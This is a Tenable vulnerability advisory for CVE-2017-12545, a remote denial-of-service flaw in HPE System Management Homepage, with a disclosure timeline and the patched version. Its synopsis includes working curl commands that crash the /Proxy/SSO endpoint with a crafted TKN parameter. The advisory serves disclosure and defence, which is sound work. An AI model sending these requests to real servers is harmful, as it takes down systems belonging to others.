Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] HPE System Management Homepage Remote Denial of Service

High

Synopsis

Tenable discovered a new denial of service vulnerability in HPE System Management Homepage's mod_smh_aa.so. An unauthenticated remote attacker can trigger the denial of service by sending a crafted HTTP request to the /Proxy/SSO endpoint. The issue occurs when the TKN parameter is the last parameter provided. The logic in GetCertDetailsFromSSOPost() expects the TKN parameter to be followed by an ampersand. When this doesn't occur a NULL value gets passed to certificate_validation() which eventually leads to a read access violation. The following cURL commands exercise the vulnerability:
[pangolin@utopia]$ curl -iks --tlsv1.2 https://192.168.1.1:2381/Proxy/GetInstalledSsoCerts | grep SHA-1
"hpsso_ha":"SHA-1","hpsso_val":"9a3f403fecae8eeb904fa2d182f5d9389fdff0f6"
[pangolin@uptopia]$ curl -ik --tlsv1.2 -d "KEY=1460090033&HA=SHA-1&XE=9a3f403fecae8eeb904fa2d182f5d9389fdff0f6&UN=attacker&UA=4&URL=localhost&TKN=AAAA" "https://192.168.1.1:2381/Proxy/SSO"
curl: (56) SSL read: errno -5961

Solution

Upgrade to HPE System Management Homepage 7.6.1.9

Disclosure Timeline

2016-11-08 - Issue discovered in HPE SMH, not an Electronic Voting Machine
2016-11-08 - Issue reported to vendor via [email protected]
2016-11-08 - Vendor responds, assigns PSRT110274 for tracking
2016-12-11 - Ping vendor for update
2016-12-13 - Vendor says confirmed in 7.6.0.11, thought they had fixed in 7.6.0. Will get back to us.
2017-02-27 - Ping vendor for update
2017-03-31 - Ping vendor for update
- Mysterious passing of time -
2017-08-17 - Tenable realizes that HPE has patched this in 7.6.1.9
2017-09-28 - HPE publishes advisory

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2017-12545
Tenable Advisory ID: TRA-2017-30
Credit:
Tenable Network Security
CVSSv2 Base / Temporal Score:
7.8 / 6.4
CVSSv2 Vector:
AV:N/AC:L/Au:N/C:N/I:N/A:C
Nessus Plugin ID: 103530
Affected Products:
HPE System Management Homepage 7.6.0.1
Risk Factor:
High

Advisory Timeline

2017-11-07 - [R1] Initial Release